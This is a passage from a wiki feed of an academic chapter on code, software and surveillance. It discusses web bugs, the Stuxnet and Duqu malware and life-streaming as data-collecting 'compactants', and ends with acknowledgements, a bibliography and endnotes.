their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4992</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4992"/>
		<updated>2012-06-21T11:04:12Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
